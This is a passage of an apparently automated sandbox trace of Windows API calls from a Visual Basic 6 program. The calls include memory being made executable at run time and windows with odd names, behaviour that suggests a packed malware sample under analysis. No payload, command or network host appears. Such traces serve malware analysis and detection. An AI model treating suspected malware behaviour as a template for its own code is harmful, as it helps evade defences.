(CodePage=0x3a8) returned 1 [0328.194] GetUserDefaultLangID () returned 0x409 [0328.194] GetSystemDefaultLangID () returned 0x530409 [0328.194] GetSystemMetrics (nIndex=42) returned 0 [0328.194] IMalloc:Alloc (This=0x75c266bc, cb=0xa8) returned 0x53d6f0 [0328.194] IMalloc:GetSize (This=0x75c266bc, pv=0x53d6f0) returned 0xa8 [0328.194] IMalloc:Alloc (This=0x75c266bc, cb=0xc) returned 0x53cf48 [0328.194] GetCurrentThreadId () returned 0x7b4 [0328.194] IMalloc:Alloc (This=0x75c266bc, cb=0x3c) returned 0x539f88 [0328.194] IMalloc:Alloc (This=0x75c266bc, cb=0x1c) returned 0x539788 [0328.195] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fe74 | out: phkResult=0x18fe74*=0x0) returned 0x2 [0328.195] IMalloc:Alloc (This=0x75c266bc, cb=0x1c) returned 0x5397b0 [0328.195] GetCurrentThreadId () returned 0x7b4 [0328.195] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0x7b4) returned 0x600ef [0328.195] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x18fdcc | out: lpWndClass=0x18fdcc) returned 0 [0328.195] RegisterClassA (lpWndClass=0x18fdcc) returned 0x98c0e2 [0328.195] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x1015c [0328.195] NtdllDefWindowProc_A (hWnd=0x1015c, Msg=0x81, wParam=0x0, lParam=0x18fa08) returned 0x1 [0328.195] NtdllDefWindowProc_A (hWnd=0x1015c, Msg=0x83, wParam=0x0, lParam=0x18f9f4) returned 0x0 [0328.195] NtdllDefWindowProc_A (hWnd=0x1015c, Msg=0x1, wParam=0x0, lParam=0x18fa08) returned 0x0 [0328.195] NtdllDefWindowProc_A (hWnd=0x1015c, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0328.195] NtdllDefWindowProc_A (hWnd=0x1015c, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0328.195] SetWindowLongA (hWnd=0x1015c, nIndex=0, dwNewLong=3612828) returned 0 [0328.195] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0328.195] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0328.195] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0328.195] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0328.195] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0328.196] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0328.196] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0328.196] CreateCompatibleDC (hdc=0x0) returned 0x120101a0 [0328.196] GetCurrentObject (hdc=0x120101a0, type=0x7) returned 0x185000f [0328.196] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x20154, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x1015e [0328.196] NtdllDefWindowProc_A (hWnd=0x1015e, Msg=0x81, wParam=0x0, lParam=0x18fa98) returned 0x1 [0328.196] NtdllDefWindowProc_A (hWnd=0x1015e, Msg=0x83, wParam=0x0, lParam=0x18fa84) returned 0x0 [0328.196] NtdllDefWindowProc_A (hWnd=0x1015e, Msg=0x1, wParam=0x0, lParam=0x18fa98) returned 0x0 [0328.196] NtdllDefWindowProc_A (hWnd=0x1015e, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0328.196] NtdllDefWindowProc_A (hWnd=0x1015e, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0328.196] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x210, wParam=0x1, lParam=0x1015e) returned 0x0 [0328.196] GetCurrentThreadId () returned 0x7b4 [0328.196] GetCurrentThreadId () returned 0x7b4 [0328.197] lstrlenA (lpString="VB") returned 2 [0328.197] lstrlenA (lpString="CommandButton") returned 13 [0328.197] lstrlenA (lpString="VB") returned 2 [0328.197] lstrlenA (lpString="Printer") returned 7 [0328.198] lstrlenA (lpString="VB") returned 2 [0328.198] lstrlenA (lpString="Form") returned 4 [0328.198] lstrlenA (lpString="VB") returned 2 [0328.198] lstrlenA (lpString="Screen") returned 6 [0328.198] lstrlenA (lpString="VB") returned 2 [0328.198] lstrlenA (lpString="Clipboard") returned 9 [0328.198] lstrlenA (lpString="VB") returned 2 [0328.198] lstrlenA (lpString="MDIForm") returned 7 [0328.198] lstrlenA (lpString="VB") returned 2 [0328.199] lstrlenA (lpString="App") returned 3 [0328.199] lstrlenA (lpString="VB") returned 2 [0328.199] lstrlenA (lpString="UserControl") returned 11 [0328.199] lstrlenA (lpString="VB") returned 2 [0328.199] lstrlenA (lpString="PropertyPage") returned 12 [0328.199] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0328.199] lstrlenA (lpString="VB") returned 2 [0328.199] lstrlenA (lpString="UserDocument") returned 12 [0328.200] GetCurrentThreadId () returned 0x7b4 [0328.200] GetCurrentThreadId () returned 0x7b4 [0328.200] GetCurrentThreadId () returned 0x7b4 [0328.200] GetCurrentThreadId () returned 0x7b4 [0328.200] GetCurrentThreadId () returned 0x7b4 [0328.200] GetCurrentThreadId () returned 0x7b4 [0328.200] GetCurrentThreadId () returned 0x7b4 [0328.200] GetCurrentThreadId () returned 0x7b4 [0328.200] GetCurrentThreadId () returned 0x7b4 [0328.201] GetCurrentThreadId () returned 0x7b4 [0328.201] lstrlenA (lpString="VB") returned 2 [0328.201] lstrlenA (lpString="PictureBox") returned 10 [0328.201] lstrlenA (lpString="VB") returned 2 [0328.201] lstrlenA (lpString="Label") returned 5 [0328.201] lstrlenA (lpString="VB") returned 2 [0328.201] lstrlenA (lpString="TextBox") returned 7 [0328.202] lstrlenA (lpString="VB") returned 2 [0328.202] lstrlenA (lpString="Frame") returned 5 [0328.202] lstrlenA (lpString="VB") returned 2 [0328.202] lstrlenA (lpString="CheckBox") returned 8 [0328.202] lstrlenA (lpString="VB") returned 2 [0328.202] lstrlenA (lpString="OptionButton") returned 12 [0328.202] lstrlenA (lpString="VB") returned 2 [0328.202] lstrlenA (lpString="ComboBox") returned 8 [0328.203] lstrlenA (lpString="VB") returned 2 [0328.203] lstrlenA (lpString="ListBox") returned 7 [0328.203] lstrlenA (lpString="VB") returned 2 [0328.203] lstrlenA (lpString="HScrollBar") returned 10 [0328.203] lstrlenA (lpString="VB") returned 2 [0328.203] lstrlenA (lpString="VScrollBar") returned 10 [0328.203] lstrlenA (lpString="VB") returned 2 [0328.203] lstrlenA (lpString="Timer") returned 5 [0328.204] lstrlenA (lpString="VB") returned 2 [0328.204] lstrlenA (lpString="DriveListBox") returned 12 [0328.204] lstrlenA (lpString="VB") returned 2 [0328.204] lstrlenA (lpString="DirListBox") returned 10 [0328.204] lstrlenA (lpString="VB") returned 2 [0328.204] lstrlenA (lpString="FileListBox") returned 11 [0328.204] lstrlenA (lpString="VB") returned 2 [0328.204] lstrlenA (lpString="Menu") returned 4 [0328.205] lstrlenA (lpString="VB") returned 2 [0328.205] lstrlenA (lpString="Shape") returned 5 [0328.205] lstrlenA (lpString="VB") returned 2 [0328.205] lstrlenA (lpString="Line") returned 4 [0328.205] lstrlenA (lpString="VB") returned 2 [0328.205] lstrlenA (lpString="Image") returned 5 [0328.205] lstrlenA (lpString="VB") returned 2 [0328.205] lstrlenA (lpString="Data") returned 4 [0328.205] lstrlenA (lpString="VB") returned 2 [0328.205] lstrlenA (lpString="OLE") returned 3 [0328.206] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x53d7a0 [0328.206] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x53d810 [0328.206] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x53d880 [0328.206] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x53d8f0 [0328.206] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x53d960 [0328.206] IMalloc:Alloc (This=0x75c266bc, cb=0xc) returned 0x53cf60 [0328.206] IMalloc:Alloc (This=0x75c266bc, cb=0x7c) returned 0x53d9d0 [0328.206] IMalloc:GetSize (This=0x75c266bc, pv=0x53d9d0) returned 0x7c [0328.206] IMalloc:Alloc (This=0x75c266bc, cb=0x20) returned 0x5399b8 [0328.206] GetCurrentThreadId () returned 0x7b4 [0328.206] GetCurrentThreadId () returned 0x7b4 [0328.206] IMalloc:Alloc (This=0x75c266bc, cb=0x1c) returned 0x5399e0 [0328.206] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x20) returned 1 [0328.207] GetCurrentProcess () returned 0xffffffff [0328.207] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0328.207] VirtualAlloc (lpAddress=0x210000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.207] VirtualAlloc (lpAddress=0x210000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.207] VirtualAlloc (lpAddress=0x210000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.207] VirtualAlloc (lpAddress=0x210000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.207] VirtualProtect (in: lpAddress=0x210000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x4) returned 1 [0328.207] GetCurrentProcess () returned 0xffffffff [0328.207] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0xa000) returned 1 [0328.207] GetCurrentThreadId () returned 0x7b4 [0328.212] SetWindowTextA (hWnd=0x20154, lpString="Ngtede") returned 1 [0328.212] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0xc, wParam=0x0, lParam=0x18fd6c) returned 0x1 [0328.212] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fd54 | out: phkResult=0x18fd54*=0x0) returned 0x2 [0328.213] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0328.213] VirtualQuery (in: lpAddress=0x18f780, lpBuffer=0x18f764, dwLength=0x1c | out: lpBuffer=0x18f764*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0328.213] IMalloc:Alloc (This=0x75c266bc, cb=0x68) returned 0x53ea58 [0328.213] IMalloc:GetSize (This=0x75c266bc, pv=0x53ea58) returned 0x68 [0328.213] GetCurrentThreadId () returned 0x7b4 [0328.213] GetCurrentThreadId () returned 0x7b4 [0328.213] GetCurrentThreadId () returned 0x7b4 [0328.214] GetCurrentThreadId () returned 0x7b4 [0328.214] GetCurrentThreadId () returned 0x7b4 [0328.214] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb4 [0328.214] GetVersionExA (in: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1375d0c, dwMinorVersion=0x18f9cc, dwBuildNumber=0x18fd00, dwPlatformId=0x18ff70, szCSDVersion="Í\x1eÒw/X\x16") | out: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0328.214] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0328.215] OleCreateFontIndirect () returned 0x0 [0328.215] lstrlenA (lpString="Langskallet7") returned 12 [0328.216] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0x70157 [0328.216] OleCreatePictureIndirect () returned 0x0 [0328.217] lstrlenA (lpString="Langskallet7") returned 12 [0328.217] lstrlenA (lpString="ThunderRT6") returned 10 [0328.217] lstrcpyA (in: lpString1=0x18fab8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0328.217] lstrlenA (lpString="ThunderRT6Form") returned 14 [0328.217] lstrcpynA (in: lpString1=0x18fac6, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0328.217] lstrlenA (lpString="ThunderRT6") returned 10 [0328.217] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0328.217] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x18fa78 | out: lpWndClass=0x18fa78) returned 0 [0328.217] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0328.217] RegisterClassA (lpWndClass=0x18fa78) returned 0xe3c109 [0328.217] lstrlenA (lpString="ThunderRT6") returned 10 [0328.217] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0328.217] lstrlenA (lpString="ThunderRT6Form") returned 14 [0328.217] lstrcpynA (in: lpString1=0x18fa5a, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0328.217] RegisterClassA (lpWndClass=0x18fa78) returned 0xc106 [0328.217] AdjustWindowRectEx (in: lpRect=0x18fb78, dwStyle=0x2cb0000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x18fb78) returned 1 [0328.217] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc106, lpWindowName="Langskallet7", dwStyle=0x2cb0000, X=302, Y=284, nWidth=342, nHeight=229, hWndParent=0x20154, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x10160 [0328.218] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x81, wParam=0x0, lParam=0x18f69c) returned 0x1 [0328.218] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x83, wParam=0x0, lParam=0x18f688) returned 0x0 [0328.219] GetSystemMenu (hWnd=0x10160, bRevert=0) returned 0x3006f [0328.220] SetWindowContextHelpId (param_1=0x10160, param_2=0xffffffff) returned 1 [0328.220] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x1, wParam=0x0, lParam=0x18f69c) returned 0x0 [0328.220] GetDC (hWnd=0x10160) returned 0x130106c8 [0328.220] GetTextMetricsA (in: hdc=0x130106c8, lptm=0x18fa64 | out: lptm=0x18fa64) returned 1 [0328.220] SetBkMode (hdc=0x130106c8, mode=1) returned 2 [0328.220] OleTranslateColor () returned 0x0 [0328.220] SetBkColor (hdc=0x130106c8, color=0xf0f0f0) returned 0xffffff [0328.220] OleTranslateColor () returned 0x0 [0328.220] SetTextColor (hdc=0x130106c8, color=0x0) returned 0x0 [0328.220] OleTranslateColor () returned 0x0 [0328.220] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0xf3006ab [0328.220] SelectObject (hdc=0x130106c8, h=0xf3006ab) returned 0x1b00017 [0328.220] SelectObject (hdc=0x130106c8, h=0x1900011) returned 0x1900010 [0328.220] ClientToScreen (in: hWnd=0x10160, lpPoint=0x18fa44 | out: lpPoint=0x18fa44) returned 1 [0328.220] SetBrushOrgEx (in: hdc=0x130106c8, x=1, y=5, lppt=0x0 | out: lppt=0x0) returned 1 [0328.220] UnrealizeObject (h=0x1900015) returned 1 [0328.220] SelectObject (hdc=0x130106c8, h=0x1900015) returned 0x1900011 [0328.220] SelectObject (hdc=0x130106c8, h=0x120a019e) returned 0x18a002e [0328.220] GetTextMetricsA (in: hdc=0x130106c8, lptm=0x18f858 | out: lptm=0x18f858) returned 1 [0328.221] GetClientRect (in: hWnd=0x10160, lpRect=0x18fbf8 | out: lpRect=0x18fbf8) returned 1 [0328.221] MapWindowPoints (in: hWndFrom=0x10160, hWndTo=0x0, lpPoints=0x18fbf8, cPoints=0x2 | out: lpPoints=0x18fbf8) returned 20250929 [0328.221] EqualRect (lprc1=0x18fbf8, lprc2=0x18fbd8) returned 1 [0328.221] SetEvent (hEvent=0xb4) returned 1 [0328.221] IsIconic (hWnd=0x10160) returned 0 [0328.221] SendMessageA (hWnd=0x10160, Msg=0x80, wParam=0x1, lParam=0x70157) returned 0x0 [0328.221] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x80, wParam=0x1, lParam=0x70157) returned 0x0 [0328.227] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x30085 [0328.228] IsIconic (hWnd=0x10160) returned 0 [0328.228] IsZoomed (hWnd=0x10160) returned 0 [0328.228] GetClientRect (in: hWnd=0x10160, lpRect=0x18fbec | out: lpRect=0x18fbec) returned 1 [0328.228] GetWindow (hWnd=0x10160, uCmd=0x5) returned 0x0 [0328.228] GetCurrentThreadId () returned 0x7b4 [0328.228] ShowWindow (hWnd=0x10160, nCmdShow=1) returned 0 [0328.228] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0328.228] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0328.228] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0328.228] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0328.229] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0328.229] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x1c, wParam=0x1, lParam=0x5d0) returned 0x0 [0328.229] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x1c, wParam=0x1, lParam=0x5d0) returned 0x0 [0328.229] GetWindowLongA (hWnd=0x1015c, nIndex=0) returned 3612828 [0328.229] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0328.229] IsIconic (hWnd=0x10160) returned 0 [0328.229] GetFocus () returned 0x0 [0328.229] GetFocus () returned 0x0 [0328.229] IsWindowEnabled (hWnd=0x10160) returned 1 [0328.229] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7b4 [0328.229] GetCurrentThreadId () returned 0x7b4 [0328.229] SetFocus (hWnd=0x10160) returned 0x0 [0328.234] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0328.235] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0328.235] IsIconic (hWnd=0x10160) returned 0 [0328.235] GetFocus () returned 0x10160 [0328.235] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0328.235] IsWindowEnabled (hWnd=0x10160) returned 1 [0328.235] PostMessageA (hWnd=0x10160, Msg=0x100e, wParam=0xa, lParam=0x0) returned 1 [0328.235] IsIconic (hWnd=0x10160) returned 0 [0328.235] PostMessageA (hWnd=0x10160, Msg=0x100e, wParam=0xe, lParam=0x0) returned 1 [0328.235] PostMessageA (hWnd=0x10160, Msg=0x105a, wParam=0x0, lParam=0x0) returned 1 [0328.236] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0328.236] IsIconic (hWnd=0x10160) returned 0 [0328.236] IsIconic (hWnd=0x10160) returned 0 [0328.236] GetParent (hWnd=0x10160) returned 0x0 [0328.236] GetWindowRect (in: hWnd=0x10160, lpRect=0x18f764 | out: lpRect=0x18f764) returned 1 [0328.236] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0328.236] GetWindowLongA (hWnd=0x10160, nIndex=-16) returned 382402560 [0328.236] GetClientRect (in: hWnd=0x10160, lpRect=0x18f7d4 | out: lpRect=0x18f7d4) returned 1 [0328.236] MapWindowPoints (in: hWndFrom=0x10160, hWndTo=0x0, lpPoints=0x18f7d4, cPoints=0x2 | out: lpPoints=0x18f7d4) returned 20250929 [0328.237] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x83, wParam=0x1, lParam=0x18f720) returned 0x0 [0328.238] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0328.238] IsIconic (hWnd=0x10160) returned 0 [0328.238] IsIconic (hWnd=0x10160) returned 0 [0328.238] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0328.238] IsWindowVisible (hWnd=0x10160) returned 1 [0328.238] IsIconic (hWnd=0x10160) returned 0 [0328.238] IsZoomed (hWnd=0x10160) returned 0 [0328.239] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x5, wParam=0x0, lParam=0xc90150) returned 0x0 [0328.239] GetClientRect (in: hWnd=0x10160, lpRect=0x18f7ac | out: lpRect=0x18f7ac) returned 1 [0328.239] GetWindow (hWnd=0x10160, uCmd=0x5) returned 0x0 [0328.239] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x3, wParam=0x0, lParam=0x1350131) returned 0x0 [0328.239] GetCurrentThreadId () returned 0x7b4 [0328.239] PostThreadMessageA (idThread=0x7b4, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0328.239] GetCurrentProcessId () returned 0x7e8 [0328.239] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0328.239] IsWindow (hWnd=0x10160) returned 1 [0328.239] GetWindowLongA (hWnd=0x10160, nIndex=-16) returned 382402560 [0328.239] IsIconic (hWnd=0x10160) returned 0 [0328.239] GetParent (hWnd=0x10160) returned 0x0 [0328.239] TranslateMessage (lpMsg=0x18fe58) returned 0 [0328.239] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0328.239] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0328.239] IsWindow (hWnd=0x10160) returned 1 [0328.239] GetWindowLongA (hWnd=0x10160, nIndex=-16) returned 382402560 [0328.239] IsIconic (hWnd=0x10160) returned 0 [0328.239] GetParent (hWnd=0x10160) returned 0x0 [0328.239] TranslateMessage (lpMsg=0x18fe58) returned 0 [0328.239] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0328.239] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0328.239] IsWindow (hWnd=0x10160) returned 1 [0328.239] GetWindowLongA (hWnd=0x10160, nIndex=-16) returned 382402560 [0328.239] IsIconic (hWnd=0x10160) returned 0 [0328.239] GetParent (hWnd=0x10160) returned 0x0 [0328.239] TranslateMessage (lpMsg=0x18fe58) returned 0 [0328.239] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0328.239] GetActiveWindow () returned 0x10160 [0328.240] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7b4 [0328.240] GetFocus () returned 0x10160 [0328.240] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0328.240] TranslateMessage (lpMsg=0x18fe58) returned 0 [0328.240] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0328.240] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0328.240] IsWindow (hWnd=0x10160) returned 1 [0328.240] GetWindowLongA (hWnd=0x10160, nIndex=-16) returned 382402560 [0328.240] IsIconic (hWnd=0x10160) returned 0 [0328.240] GetParent (hWnd=0x10160) returned 0x0 [0328.240] TranslateMessage (lpMsg=0x18fe58) returned 0 [0328.240] DispatchMessageA (lpMsg=0x18fe58) [0328.240] IsIconic (hWnd=0x10160) returned 0 [0328.240] IsIconic (hWnd=0x10160) returned 0 [0328.240] BeginPaint (in: hWnd=0x10160, lpPaint=0x18fa00 | out: lpPaint=0x18fa00) returned 0x130106c8 [0328.240] GetClientRect (in: hWnd=0x10160, lpRect=0x18fa40 | out: lpRect=0x18fa40) returned 1 [0328.240] OleTranslateColor () returned 0x0 [0328.240] OleTranslateColor () returned 0x0 [0328.240] CreateSolidBrush (color=0xf0f0f0) returned 0xc1006c2 [0328.240] OleTranslateColor () returned 0x0 [0328.240] OleTranslateColor () returned 0x0 [0328.240] SetTextColor (hdc=0x130106c8, color=0x0) returned 0x0 [0328.240] SetBkColor (hdc=0x130106c8, color=0xf0f0f0) returned 0xf0f0f0 [0328.240] FillRect (hDC=0x130106c8, lprc=0x18fa40, hbr=0xc1006c2) returned 1 [0328.240] SetTextColor (hdc=0x130106c8, color=0x0) returned 0x0 [0328.240] SetBkColor (hdc=0x130106c8, color=0xf0f0f0) returned 0xf0f0f0 [0328.240] EndPaint (hWnd=0x10160, lpPaint=0x18fa00) returned 1 [0328.241] IsWindowVisible (hWnd=0x10160) returned 1 [0328.241] IsIconic (hWnd=0x10160) returned 0 [0328.241] IsZoomed (hWnd=0x10160) returned 0 [0328.241] ShowWindow (hWnd=0x10160, nCmdShow=0) returned 1 [0328.241] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0328.241] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0328.241] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0328.242] GetParent (hWnd=0x10160) returned 0x0 [0328.242] GetWindowRect (in: hWnd=0x10160, lpRect=0x18ef9c | out: lpRect=0x18ef9c) returned 1 [0328.242] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x47, wParam=0x0, lParam=0x18f374) returned 0x0 [0328.242] GetWindowLongA (hWnd=0x10160, nIndex=-16) returned 113967104 [0328.242] GetClientRect (in: hWnd=0x10160, lpRect=0x18f00c | out: lpRect=0x18f00c) returned 1 [0328.242] MapWindowPoints (in: hWndFrom=0x10160, hWndTo=0x0, lpPoints=0x18f00c, cPoints=0x2 | out: lpPoints=0x18f00c) returned 20250929 [0328.242] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0328.243] GetFocus () returned 0x10160 [0328.243] GetClassInfoA (in: hInstance=0x72940000, lpClassName="COMBOBOX", lpWndClass=0x18eff0 | out: lpWndClass=0x18eff0) returned 1 [0328.243] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x1c, wParam=0x0, lParam=0x5d0) returned 0x0 [0328.243] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x1c, wParam=0x0, lParam=0x5d0) returned 0x0 [0328.243] GetWindowLongA (hWnd=0x1015c, nIndex=0) returned 3612828 [0328.243] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0328.243] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0328.243] NtdllDefWindowProc_A (hWnd=0x10160, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0328.244] VarAnd (in: pvarLeft=0x18f6f4, pvarRight=0x18f704, pvarResult=0x18f6e4 | out: pvarResult=0x18f6e4) returned 0x0 [0328.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0328.244] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.244] CreateCompatibleBitmap (hdc=0x130106c8, cx=1440, cy=900) returned 0x110506c1 [0328.245] CreateCompatibleDC (hdc=0x130106c8) returned 0xd0106c6 [0328.245] SelectObject (hdc=0xd0106c6, h=0x110506c1) returned 0x185000f [0328.246] SetBkMode (hdc=0xd0106c6, mode=1) returned 2 [0328.246] OleTranslateColor () returned 0x0 [0328.246] SetBkColor (hdc=0xd0106c6, color=0xf0f0f0) returned 0xffffff [0328.246] OleTranslateColor () returned 0x0 [0328.246] UnrealizeObject (h=0xc1006c2) returned 1 [0328.246] FillRect (hDC=0xd0106c6, lprc=0x18f5a8, hbr=0xc1006c2) returned 1 [0328.246] OleCreatePictureIndirect () returned 0x0 [0328.246] SelectObject (hdc=0xd0106c6, h=0xf3006ab) returned 0x1b00017 [0328.246] SelectObject (hdc=0xd0106c6, h=0x120a019e) returned 0x18a002e [0328.246] SelectObject (hdc=0xd0106c6, h=0x1900011) returned 0x1900010 